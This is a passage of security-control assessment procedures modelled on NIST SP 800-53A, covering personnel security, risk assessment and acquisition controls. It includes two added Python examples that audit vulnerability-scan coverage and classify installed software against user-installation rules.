(iv) the organization reviews/updates the access agreements in accordance with the organization-defined frequency.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing access agreements for organizational information and information systems; security plan; access agreements; records of access agreement reviews and updates; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
PS-7 THIRD-PARTY PERSONNEL SECURITY
Control: The organization establishes personnel security requirements including security roles and responsibilities for third-party providers and monitors provider compliance.
Supplemental Guidance: Third-party providers include, for example, service bureaus, contractors, and other organizations providing information system development, information technology services, outsourced applications, and network and security management. The organization explicitly includes personnel security requirements in acquisition-related documents. NIST Special Publication 800-35 provides guidance on information technology security services.
PS-7.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization establishes personnel security requirements, including security roles and responsibilities, for third-party providers (e.g., service bureaus, contractors, and other organizations providing information system development, information technology services, outsourced applications, network and security management);
(ii) the organization explicitly includes personnel security requirements in acquisition-related documents in accordance with NIST Special Publication 800-35; and
(iii) the organization monitors third-party provider compliance with personnel security requirements.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing third-party personnel security; list of personnel security requirements; acquisition documents; compliance monitoring process; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with personnel security responsibilities; third-party providers]. (M) (H)


ASSESSMENT PROCEDURE
PS-8 PERSONNEL SANCTIONS
Control: The organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures.
Supplemental Guidance: The sanctions process is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The sanctions process can be included as part of the general personnel policies and procedures for the organization.
PS-8.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures; and
(ii) the personnel sanctions process is consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Personnel security policy; procedures addressing personnel sanctions; rules of behavior; records of formal sanctions; other relevant documents or records]. (L) (M) (H)


FAMILY: Risk Assessment


ASSESSMENT PROCEDURE
RA-1 RISK ASSESSMENT POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented risk assessment policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the risk assessment policy and associated risk assessment controls.
Supplemental Guidance: The risk assessment policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The risk assessment policy can be included as part of the general information security policy for the organization. Risk assessment procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-30 provides guidance on the assessment of risk. NIST Special Publication 800-12 provides guidance on security policies and procedures.
RA-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents risk assessment policy and procedures;
(ii) the organization disseminates risk assessment policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review risk assessment policy and procedures; and
(iv) the organization updates risk assessment policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (H)
RA-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the risk assessment policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the risk assessment policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the risk assessment procedures address all areas identified in the risk assessment policy and address achieving policy-compliant implementations of all associated risk assessment controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (H)


ASSESSMENT PROCEDURE
RA-2 SECURITY CATEGORIZATION
Control: The organization categorizes the information system and the information processed, stored, or transmitted by the system in accordance with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance and documents the results (including supporting rationale) in the system security plan. Designated senior-level officials within the organization review and approve the security categorizations.
Supplemental Guidance: The applicable federal standard for security categorization of nonnational security information and information systems is FIPS 199. The organization conducts FIPS 199 security categorizations as an organization-wide activity with the involvement of the chief information officer, senior agency information security officer, information system owners, and information owners. The organization also considers potential impacts to other organizations and, in accordance with the USA PATRIOT Act of 2001 and Homeland Security Presidential Directives, potential national-level impacts in categorizing the information system. As part of a defense-in-depth protection strategy, the organization considers partitioning higher-impact information systems into separate physical domains (or environments) and restricting or prohibiting network access in accordance with an organizational assessment of risk. NIST Special Publication 800-60 provides guidance on determining the security categories of the information types resident on the information system. Related security controls: MP-4, SC-7.
RA-2.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization conducts the security categorization of the information system as an organization-wide exercise with the involvement of senior-level officials including, but not limited to, authorizing officials, information system owners, chief information officer, senior agency information security officer, and mission/information owners;
(ii) the security categorization is consistent with FIPS 199 and considers the provisional impact levels and special factors in NIST Special Publication 800-60;
(iii) the organization considers, in the security categorization of the information system, potential impacts to other organizations and, in accordance with the USA PATRIOT Act of 2001 and Homeland Security Presidential Directives, potential national-level impacts;
(iv) the organization includes supporting rationale for impact-level decisions as part of the security categorization; and
(v) designated, senior-level organizational officials review and approve the security categorizations.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; procedures addressing security categorization of organizational information and information systems; security planning policy and procedures; FIPS 199; NIST Special Publication 800-60; security plan; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with security categorization and risk assessment responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
RA-3 RISK ASSESSMENT
Control: The organization conducts assessments of the risk and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of information and information systems that support the operations and assets of the agency (including information and information systems managed/operated by external parties).
Supplemental Guidance: Risk assessments take into account vulnerabilities, threat sources, and security controls planned or in place to determine the resulting level of residual risk posed to organizational operations, organizational assets, or individuals based on the operation of the information system. The organization also considers potential impacts to other organizations and, in accordance with the USA PATRIOT Act and Homeland Security Presidential Directives, potential national-level impacts in categorizing the information system. Risk assessments also take into account risk posed to organizational operations, organizational assets, or individuals from external parties (e.g., service providers, contractors operating information systems on behalf of the organization, individuals accessing organizational information systems, outsourcing entities). In accordance with OMB policy and related E-authentication initiatives, authentication of public users accessing federal information systems may also be required to protect nonpublic or privacy-related information. As such, organizational assessments of risk also address public access to federal information systems. The General Services Administration provides tools supporting that portion of the risk assessment dealing with public access to federal information systems. NIST Special Publication 800-30 provides guidance on conducting risk assessments including threat, vulnerability, and impact assessments.
RA-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization assesses the risk and magnitude of harm that could result from the unauthorized access, use, disclosure, disruption, modification, or destruction of information and information systems that support its operations and assets (including information and information systems managed/operated by external parties); and
(ii) the risk assessment is consistent with NIST Special Publication 800-30.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; security planning policy and procedures; procedures addressing organizational assessments of risk; risk assessment; NIST Special Publication 800-30; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with risk assessment responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
RA-4 RISK ASSESSMENT UPDATE
Control: The organization updates the risk assessment [Assignment: organization-defined frequency] or whenever there are significant changes to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system.
Supplemental Guidance: The organization develops and documents specific criteria for what is considered significant change to the information system. NIST Special Publication 800-30 provides guidance on conducting risk assessment updates.
RA-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of risk assessment updates;
(ii) the organization develops and documents specific criteria for what is considered significant change to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system;
(iii) the organization updates the risk assessment in accordance with the organization-defined frequency or whenever there are significant changes to the information system, the facilities where the system resides, or other conditions that may impact the security or accreditation status of the system; and
(iv) the risk assessment update is consistent with NIST Special Publication 800-30.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; security planning policy and procedures; procedures addressing risk assessment updates; risk assessment; security plan; records of risk assessment updates; NIST Special Publication 800-30; other relevant documents or records]. (L) (M) (H)


ASSESSMENT PROCEDURE
RA-5 VULNERABILITY SCANNING
Control: The organization scans for vulnerabilities in the information system [Assignment: organization-defined frequency] or when significant new vulnerabilities potentially affecting the system are identified and reported.
Supplemental Guidance: Vulnerability scanning is conducted using appropriate scanning tools and techniques. The organization trains selected personnel in the use and maintenance of vulnerability scanning tools and techniques. Vulnerability scans are scheduled and/or random in accordance with organizational policy and assessment of risk. The information obtained from the vulnerability scanning process is freely shared with appropriate personnel throughout the organization to help eliminate similar vulnerabilities in other information systems. Vulnerability analysis for custom software and applications may require additional, more specialized approaches (e.g., vulnerability scanning tools for applications, source code reviews, static analysis of source code). NIST Special Publication 800-42 provides guidance on network security testing. NIST Special Publication 800-40 (Version 2) provides guidance on patch and vulnerability management.
RA-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of vulnerability scans within the information system;
(ii) the organization scans for vulnerabilities in the information system in accordance with the organization-defined frequency and/or at random in accordance with organizational policy and assessment of risk, or when significant new vulnerabilities potentially affecting the system are identified and reported;
(iii) the organization uses appropriate scanning tools and techniques to conduct the vulnerability scans;
(iv) the organization trains selected personnel in the use and maintenance of vulnerability scanning tools and techniques; and
(v) the organization freely shares the information obtained from the vulnerability scanning process with appropriate personnel throughout the organization to help eliminate similar vulnerabilities in other information systems.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; security plan; vulnerability scanning results; patch and vulnerability management records; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with risk assessment and vulnerability scanning responsibilities]. (M) (H)
RA-5(1) VULNERABILITY SCANNING
Control Enhancement:
The organization employs vulnerability scanning tools that include the capability to readily update the list of information system vulnerabilities scanned.
RA-5(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization uses vulnerability scanning tools that have the capability to readily update the list of information system vulnerabilities scanned.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; vulnerability scanning tools and techniques documentation; vulnerability scanning results; patch and vulnerability management records; other relevant documents or records]. (H)
Test: [SELECT FROM: Vulnerability scanning capability and associated scanning tools]. (H)
RA-5(2) VULNERABILITY SCANNING
Control Enhancement:
The organization updates the list of information system vulnerabilities scanned [Assignment: organization-defined frequency] or when significant new vulnerabilities are identified and reported.
RA-5(2).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization defines in the security plan, explicitly or by reference, the frequency of updates for information system vulnerabilities scanned; and
(ii) the organization updates the list of information system vulnerabilities scanned in accordance with the organization-defined frequency or when significant new vulnerabilities are identified and reported.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; security plan; list of vulnerabilities scanned; records of updates to vulnerabilities scanned; other relevant documents or records]. (H)
RA-5(3) VULNERABILITY SCANNING
Control Enhancement:
The organization employs vulnerability scanning procedures that can demonstrate the breadth and depth of scan coverage, including vulnerabilities checked and information system components scanned.
RA-5(3).1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization implements procedures that can demonstrate the breadth of scan coverage (including information system components scanned); and
(ii) the organization implements procedures that can demonstrate the depth of scan coverage (including vulnerabilities checked).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: Risk assessment policy; procedures addressing vulnerability scanning; risk assessment; list of vulnerabilities scanned and information system components checked; other relevant documents or records].
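Assessors testing RA-5(2) and RA-5(3) usually reconcile the scanner's export against the security plan rather than accept the scan report at face value. The Python below is an added example written for this page, not part of SP 800-53A or of any scanner product. It takes a constructed component inventory, a constructed list of required checks and a constructed scan export, and reports breadth gaps (planned components never scanned, and scanned hosts absent from the plan), depth gaps (required checks that did not run on each host), and whether the vulnerability list was updated within the organization-defined frequency at scan time. The record field names and the 30-day frequency are assumptions.

```python
"""Scan-coverage and feed-currency checks supporting RA-5(2) and RA-5(3).

Added assessor example, not from SP 800-53A. Every input below is constructed:
the inventory stands in for the security plan's component list, REQUIRED_CHECKS
for the organization's list of vulnerabilities to scan for, and SCAN_RESULTS for
a scanner export. The 30-day default is an assumed organization-defined frequency.
"""
from datetime import date, timedelta

# Constructed: components listed in the security plan (breadth baseline), address -> name.
INVENTORY = {
    "10.0.1.10": "web-01",
    "10.0.1.11": "web-02",
    "10.0.2.20": "db-01",
    "10.0.3.30": "mgmt-01",
}

# Constructed: checks the organization's vulnerability list says must run (depth baseline).
REQUIRED_CHECKS = {"CVE-2024-0001", "CVE-2024-0002", "CVE-2024-0003", "CVE-2024-0004"}

# Constructed scanner export: feed timestamp, scan date, and the checks that ran per host.
SCAN_RESULTS = {
    "feed_updated": date(2024, 5, 1),
    "scan_date": date(2024, 6, 10),
    "hosts": {
        "10.0.1.10": {"checks_run": {"CVE-2024-0001", "CVE-2024-0002", "CVE-2024-0003"}},
        "10.0.1.11": {"checks_run": {"CVE-2024-0001", "CVE-2024-0002", "CVE-2024-0003", "CVE-2024-0004"}},
        "10.0.2.20": {"checks_run": {"CVE-2024-0001"}},   # assumed: credentialed checks failed
        "10.0.9.99": {"checks_run": {"CVE-2024-0001"}},   # scanned, but not in the security plan
    },
}


def breadth_gaps(inventory, results):
    """RA-5(3)(i): planned components the scan never touched, and scanned hosts not in the plan."""
    scanned = set(results["hosts"])
    planned = set(inventory)
    return {"unscanned": sorted(planned - scanned), "unlisted": sorted(scanned - planned)}


def depth_gaps(required, results):
    """RA-5(3)(ii): for each scanned host, the required checks that did not run."""
    gaps = {}
    for host, record in results["hosts"].items():
        missing = required - record["checks_run"]
        if missing:
            gaps[host] = sorted(missing)
    return gaps


def feed_is_current(results, max_age_days):
    """RA-5(2)(ii): the vulnerability list was updated within the defined frequency at scan time."""
    age = results["scan_date"] - results["feed_updated"]
    return age <= timedelta(days=max_age_days)


def coverage_report(inventory, required, results, max_age_days=30):
    """Combine the three checks into one record an assessor can attach to the RA-5 finding."""
    breadth = breadth_gaps(inventory, results)
    covered = len(inventory) - len(breadth["unscanned"])
    return {
        "breadth_pct": round(100 * covered / len(inventory), 1),
        "unscanned": breadth["unscanned"],
        "unlisted": breadth["unlisted"],
        "depth_gaps": depth_gaps(required, results),
        "feed_current": feed_is_current(results, max_age_days),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(coverage_report(INVENTORY, REQUIRED_CHECKS, SCAN_RESULTS), indent=2))
```

On the constructed data the report shows 75% breadth (mgmt-01 never scanned), one host scanned that the plan does not know about, depth gaps on two planned hosts, and a feed 40 days old against a 30-day frequency; each of those maps to a specific objective element above, which is what makes the result usable as evidence.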


FAMILY:

System and Services Acquisition


ASSESSMENT PROCEDURE
SA-1 SYSTEM AND SERVICES ACQUISITION POLICY AND PROCEDURES
Control: The organization develops, disseminates, and periodically reviews/updates: (i) a formal, documented, system and services acquisition policy that includes information security considerations and that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and (ii) formal, documented procedures to facilitate the implementation of the system and services acquisition policy and associated system and services acquisition controls.
Supplemental Guidance: The system and services acquisition policy and procedures are consistent with applicable laws, Executive Orders, directives, policies, regulations, standards, and guidance. The system and services acquisition policy can be included as part of the general information security policy for the organization. System and services acquisition procedures can be developed for the security program in general, and for a particular information system, when required. NIST Special Publication 800-12 provides guidance on security policies and procedures.
SA-1.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization develops and documents system and services acquisition policy and procedures;
(ii) the organization disseminates system and services acquisition policy and procedures to appropriate elements within the organization;
(iii) responsible parties within the organization periodically review system and services acquisition policy and procedures; and
(iv) the organization updates system and services acquisition policy and procedures when organizational review indicates updates are required.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (H)
SA-1.2 ASSESSMENT OBJECTIVE:
Determine if:
(i) the system and services acquisition policy addresses purpose, scope, roles and responsibilities, management commitment, coordination among organizational entities, and compliance;
(ii) the system and services acquisition policy is consistent with the organization's mission and functions and with applicable laws, directives, policies, regulations, standards, and guidance; and
(iii) the system and services acquisition procedures address all areas identified in the system and services acquisition policy and address achieving policy-compliant implementations of all associated system and services acquisition controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy and procedures; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with system and services acquisition responsibilities]. (H)


ASSESSMENT PROCEDURE
SA-2 ALLOCATION OF RESOURCES
Control: The organization determines, documents, and allocates as part of its capital planning and investment control process, the resources required to adequately protect the information system.
Supplemental Guidance: The organization includes the determination of security requirements for the information system in mission/business case planning and establishes a discrete line item for information system security in the organization's programming and budgeting documentation. NIST Special Publication 800-65 provides guidance on integrating security into the capital planning and investment control process.
SA-2.1 ASSESSMENT OBJECTIVE:
Determine if the organization determines, documents, and allocates as part of its capital planning and investment control process, the resources required to adequately protect the information system by verifying that the organization:
  • includes the determination of security requirements for the information system in mission/business case planning; and
  • establishes a discrete line item for information system security in the organization's programming and budgeting documentation.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the allocation of resources to information security requirements; NIST Special Publication 800-65; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with capital planning and investment responsibilities]. (M) (H)


ASSESSMENT PROCEDURE
SA-3 LIFE CYCLE SUPPORT
Control: The organization manages the information system using a system development life cycle methodology that includes information security considerations.
Supplemental Guidance: NIST Special Publication 800-64 provides guidance on security considerations in the system development life cycle.
SA-3.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization manages the information system using a system development life cycle methodology that includes information security considerations; and
(ii) the organization uses a system development life cycle that is consistent with NIST Special Publication 800-64.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security into the system development life cycle process; NIST Special Publication 800-64; information system development life cycle documentation; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information security and system life cycle development responsibilities]. (H)


ASSESSMENT PROCEDURE
SA-4 ACQUISITIONS
Control: The organization includes security requirements and/or security specifications, either explicitly or by reference, in information system acquisition contracts based on an assessment of risk and in accordance with applicable laws, Executive Orders, directives, policies, regulations, and standards.
Supplemental Guidance:
Solicitation Documents
The solicitation documents (e.g., Requests for Proposals) for information systems and services include, either explicitly or by reference, security requirements that describe: (i) required security capabilities (security needs and, as necessary, specific security controls and other specific FISMA requirements); (ii) required design and development processes; (iii) required test and evaluation procedures; and (iv) required documentation. The requirements in the solicitation documents permit updating security controls as new threats/vulnerabilities are identified and as new technologies are implemented. NIST Special Publication 800-36 provides guidance on the selection of information security products. NIST Special Publication 800-35 provides guidance on information technology security services. NIST Special Publication 800-64 provides guidance on security considerations in the system development life cycle.
Information System Documentation
The solicitation documents include requirements for appropriate information system documentation. The documentation addresses user and systems administrator guidance and information regarding the implementation of the security controls in the information system. The level of detail required in the documentation is based on the FIPS 199 security category for the information system.
Use of Tested, Evaluated, and Validated Products
NIST Special Publication 800-23 provides guidance on the acquisition and use of tested/evaluated information technology products.
Configuration Settings and Implementation Guidance
The information system required documentation includes security configuration settings and security implementation guidance. OMB FISMA reporting instructions provide guidance on configuration requirements for federal information systems. NIST Special Publication 800-70 provides guidance on configuration settings for information technology products.
SA-4.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization includes in acquisition contracts for information systems, either explicitly or by reference, security requirements and/or security specifications based on an assessment of risk and in accordance with applicable laws, Executive Orders, directives, policies, regulations, and standards that describe required:
  • security capabilities;
  • design and development processes;
  • test and evaluation procedures; and
  • documentation.
(ii) the organization includes in acquisition contracts requirements for information system documentation addressing user and systems administrator guidance and information regarding the implementation of the security controls in the system, at a level of detail based on the FIPS 199 security category for the system; and
(iii) the organization includes in acquisition contracts requirements for information system documentation that includes security configuration settings and security implementation guidance.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; NIST Special Publications 800-23 and 800-70; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system security, acquisition, and contracting responsibilities]. (M) (H)
SA-4(1) ACQUISITIONS
Control Enhancement:
The organization requires in solicitation documents that appropriate documentation be provided describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls.
SA-4(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization requires in solicitation documents that appropriate documentation be provided describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; solicitation documents; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records]. (M) (H)
SA-4(2) ACQUISITIONS
Control Enhancement:
The organization requires in solicitation documents that appropriate documentation be provided describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components).
SA-4(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization requires in solicitation documents that appropriate documentation be provided describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing the integration of information security requirements and/or security specifications into the acquisition process; solicitation documents; acquisition documentation; acquisition contracts for information systems or services; other relevant documents or records].


ASSESSMENT PROCEDURE
SA-5 INFORMATION SYSTEM DOCUMENTATION
Control: The organization obtains, protects as required, and makes available to authorized personnel, adequate documentation for the information system.
Supplemental Guidance: Documentation includes administrator and user guides with information on: (i) configuring, installing, and operating the information system; and (ii) effectively using the system's security features. When adequate information system documentation is either unavailable or nonexistent (e.g., due to the age of the system or lack of support from the vendor/manufacturer), the organization documents attempts to obtain such documentation and provides compensating security controls, if needed.
SA-5.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization obtains, protects as required, and makes available to authorized personnel, information system administrator and user guidance with information on:
  • configuring, installing, and operating the information system; and
  • effectively using the system's security features; or
(ii) when this information is either unavailable or nonexistent (e.g., due to the age of the system or lack of support from the vendor/manufacturer), the organization documents attempts to obtain such documentation and provides compensating security controls, if needed.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system documentation including administrator and user guides; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system documentation responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H)
SA-5(1) INFORMATION SYSTEM DOCUMENTATION
Control Enhancement:
The organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls.
SA-5(1).1 ASSESSMENT OBJECTIVE:
Determine if the organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system design documentation; other relevant documents or records]. (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system security, acquisition, and contracting responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H)
SA-5(2) INFORMATION SYSTEM DOCUMENTATION
Control Enhancement:
The organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components).
SA-5(2).1 ASSESSMENT OBJECTIVE:
Determine if the organization includes, in addition to administrator and user guides, documentation, if available from the vendor/manufacturer, describing the design and implementation details of the security controls employed within the information system with sufficient detail to permit analysis and testing of the controls (including functional interfaces among control components).
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing information system documentation; information system design documentation; other relevant documents or records]. (H)
Interview: [SELECT FROM: Organizational personnel with information system security documentation responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (H)


ASSESSMENT PROCEDURE
SA-6 SOFTWARE USAGE RESTRICTIONS
Control: The organization complies with software usage restrictions.
Supplemental Guidance: Software and associated documentation are used in accordance with contract agreements and copyright laws. For software and associated documentation protected by quantity licenses, the organization employs tracking systems to control copying and distribution. The organization controls and documents the use of publicly accessible peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work.
SA-6.1 ASSESSMENT OBJECTIVE:
Determine if:
(i) the organization complies with software usage restrictions; and
(ii) the organization employs tracking systems to control copying and distribution of software and associated documentation protected by quantity licenses; and
(iii) the organization controls and documents the use of publicly accessible peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing software usage restrictions; site license documentation; list of software usage restrictions; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system administration responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (H)


ASSESSMENT PROCEDURE
SA-7 USER INSTALLED SOFTWARE
Control: The organization enforces explicit rules governing the installation of software by users.
Supplemental Guidance: If provided the necessary privileges, users have the ability to install software. The organization identifies what types of software installations are permitted (e.g., updates and security patches to existing software) and what types of installations are prohibited (e.g., software that is free only for personal, not government use, and software whose pedigree with regard to being potentially malicious is unknown or suspect).
SA-7.1 ASSESSMENT OBJECTIVE:
Determine if the organization enforces explicit rules governing the installation of software by users that include organization-identified types of software installations that are permitted and types of installations that are prohibited.
POTENTIAL ASSESSMENT METHODS AND OBJECTS:
Examine: [SELECT FROM: System and services acquisition policy; procedures addressing user installed software; list of rules governing user installed software; network traffic on the information system; other relevant documents or records]. (L) (M) (H)
Interview: [SELECT FROM: Organizational personnel with information system administration responsibilities; organizational personnel operating, using, and/or maintaining the information system]. (M) (H)
Test: [SELECT FROM: Enforcement of rules for user installed software on the information system; information system for prohibited software]. (H)
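The Test method above ("information system for prohibited software") is most repeatable as a comparison of the host's installed-software inventory against the organization's explicit rules. The Python below is an added example, not from SP 800-53A or from any inventory product. It encodes the control's own examples as rules (updates and patches to already-approved software are permitted; software licensed only for personal use, and software of unknown or unverifiable pedigree, are prohibited) and evaluates a constructed inventory against them. The approved baseline, the trusted-publisher set, the inventory field names and the intermediate "review" verdict for items that need an approval record are all assumptions.

```python
"""Evaluate installed software against explicit user-installation rules (SA-7 test).

Added example, not from SP 800-53A. BASELINE, TRUSTED_PUBLISHERS and INSTALLED are
constructed; the field names (publisher, license, signed) are assumed to come from
a host inventory agent. The rules mirror the control's examples: updates/patches to
existing software are permitted; personal-use-only licences and unknown pedigree
are prohibited. Anything else is routed for review rather than silently allowed.
"""

# Constructed: software the organization approved and installed itself (name -> version).
BASELINE = {"openssl": "3.0.10", "git": "2.43.0", "libreoffice": "7.6.2"}

# Constructed: publishers whose code-signing identity the organization trusts.
TRUSTED_PUBLISHERS = {"Vendor A Inc.", "Distro Project"}

# Assumed licence strings an inventory agent might report for personal-use-only software.
PERSONAL_USE_LICENSES = {"free-for-personal-use", "non-commercial"}

# Constructed inventory after users installed software on a host.
INSTALLED = [
    {"name": "openssl", "version": "3.0.13", "publisher": "Distro Project", "license": "Apache-2.0", "signed": True},
    {"name": "git", "version": "2.43.0", "publisher": "Distro Project", "license": "GPL-2.0", "signed": True},
    {"name": "photo-tool", "version": "1.2", "publisher": "Hobby Soft", "license": "free-for-personal-use", "signed": False},
    {"name": "netscan", "version": "0.9", "publisher": "", "license": "unknown", "signed": False},
    {"name": "browser-x", "version": "120.0", "publisher": "Vendor A Inc.", "license": "proprietary", "signed": True},
]


def _version_tuple(version):
    """Dotted numeric version -> tuple, so '3.0.13' compares greater than '3.0.9'."""
    return tuple(int(part) for part in version.split("."))


def classify(item, baseline, trusted):
    """Return (verdict, reason) for one installed package.

    Prohibitions are evaluated before permissions, so a personal-use-only or
    unsigned 'update' of baseline software is still prohibited.
    """
    if item["license"] in PERSONAL_USE_LICENSES:
        return "prohibited", "license is for personal use only"
    if not item["publisher"] or not item["signed"]:
        return "prohibited", "unknown or unverifiable pedigree"
    if item["name"] in baseline:
        if _version_tuple(item["version"]) >= _version_tuple(baseline[item["name"]]):
            return "permitted", "update or patch to existing software"
        return "review", "downgrade of baseline software"
    if item["publisher"] in trusted:
        return "review", "new software from trusted publisher; needs approval record"
    return "prohibited", "new software from untrusted publisher"


def audit(installed, baseline=BASELINE, trusted=TRUSTED_PUBLISHERS):
    """Map each installed package name to its (verdict, reason)."""
    return {item["name"]: classify(item, baseline, trusted) for item in installed}


def prohibited(installed, **kwargs):
    """Names of packages the rules prohibit; the list an assessor records as the test result."""
    return sorted(name for name, (verdict, _) in audit(installed, **kwargs).items() if verdict == "prohibited")


if __name__ == "__main__":
    for name, (verdict, reason) in audit(INSTALLED).items():
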